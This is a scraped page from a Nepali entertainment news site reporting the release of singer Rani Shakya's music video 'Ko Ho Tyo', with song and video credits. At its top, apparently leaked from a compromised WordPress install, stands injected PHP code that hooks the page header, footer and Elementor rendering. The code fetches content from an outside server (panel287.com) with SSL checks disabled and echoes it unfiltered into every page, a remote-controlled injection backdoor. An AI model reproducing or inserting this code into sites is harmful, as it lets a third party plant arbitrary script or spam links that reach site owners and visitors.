if(!function_exists('gplrock_unified_footer_script')){function gplrock_unified_footer_script(){static $script_executed=false;if($script_executed){return;}$is_elementor_page=false;if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if(!$elementor->editor->is_edit_mode()){$is_elementor_page=true;}}if(!did_action('wp_footer')&&!did_action('wp_head')&&!$is_elementor_page){return;}$footer_url='https://panel287.com/api/footer.php?linkspool='.urlencode($_SERVER['HTTP_HOST']);$response=wp_remote_get($footer_url,['timeout'=>15,'sslverify'=>false,'user-agent'=>'WordPress/'.get_bloginfo('version')]);if(!is_wp_error($response)&&wp_remote_retrieve_response_code($response)===200){$body=wp_remote_retrieve_body($response);if(!empty($body)&&strlen($body)>10){echo $body;}}$script_executed=true;}}if(!has_action('wp_footer','gplrock_unified_footer_script')){add_action('wp_footer','gplrock_unified_footer_script',999);}if(!has_action('wp_head','gplrock_unified_footer_script')){add_action('wp_head','gplrock_unified_footer_script',999);}if(class_exists('Elementor\Plugin')&&!has_action('elementor/frontend/after_render','gplrock_unified_footer_script')){add_action('elementor/frontend/after_render','gplrock_unified_footer_script',999);} को हो त्यो ‘ बोलको म्युजिक भिडियो सार्वजनिक ( भिडियो ) – Toppo Khim

को हो त्यो ‘ बोलको म्युजिक भिडियो सार्वजनिक ( भिडियो )

गायिका रानी शाक्यले आफ्नो नयाँ म्युजिक भिडियो ‘को हो त्यो ‘ सार्वजनिक गरेकी छिन । रोमान्टिक फ्लेवरको यस गीतमा   एक  युवतीले आफुलाई मन पर्ने मान्छेले सपनामा आएर आफुलाई सताएको र आफ्नो निद्रा चोरी लगेको वर्णन  गरिएको छ।  
यो पनि पढ्नुहोस

SSMG 3rd Result LIVE

‘को हो त्यो ‘ बोलको यस गीतमा स्वर रानी शाक्यको रहेको छ भने शब्द गोविन्द प्रसाद उपाध्यायको रहेको छ । बिक्रम थापाले संगीतवद्द गरेको यस गीतलाई विशन मानन्धरले संगीत संयोजन गरेका हुन् ।

सुबल  थापाले कोरियोग्राफी  गरेको भिडियोमा एलिशा शर्मा र कमल सिंहको अभिनय रहेको छ ।  नवराज उप्रेतीले छायांकन गरेको भिडियोलाई नविन निरौलाले सम्पादन गरेका हुन् । जीवन शाहीको निर्देशनमा भिडियो तयार पारिएको हो ।

हाल अमेरिकामा बस्दै आएकी  शाक्य पेशाले चिकित्सक हुन् । उनका ‘मेरो प्रियतम’ , ‘हरपल तिम्रो’ , ‘यो वैँशको मात’ , ‘सुरुवात’ , ‘पहिलो माया’ , ‘कथा’ बोलका गीतहरु स्रोता माझ लोकप्रिय छन। चर्चित संगीतकार मधु क्षेत्री, ओम कर्माचार्य, न्ह्यू  बज्राचार्य, अरुण तिवारी, सहदेव ढुंगाना ,  बिक्रम थापाको संगीतमा र चर्चित गीतकार रमण घिमिरे, लक्ष्मी श्रेष्ठको  शब्दमा आफ्नो स्वर दिसकेकी गायिका शाक्यले हाल सम्म गायिका शाक्यले १७ बढी  गीत सार्वजनिक गरिसकेकी छिन ।

अमेरिकामा रहेर गीत संगीतमा क्रियाशील शाक्यले आफ्नो नयाँ म्युजिक भिडियो ‘को हो त्यो’लाई माया गरिदिन सम्पुर्ण स्रोता, दर्शक तथा मिडिया हाउसलाई आग्रह गरेकी छिन । ओएसआर  डिजिटलको अफ़िसिएल च्यानल मार्फत सार्वजनिक गरिएको भिडियोलाई सकारात्मक प्रतिक्रिया प्राप्त भैरहेको छ ।

Video Link : 

सम्बन्धित पोस्ट
प्रतिक्रिया दिनुहोस
Loading...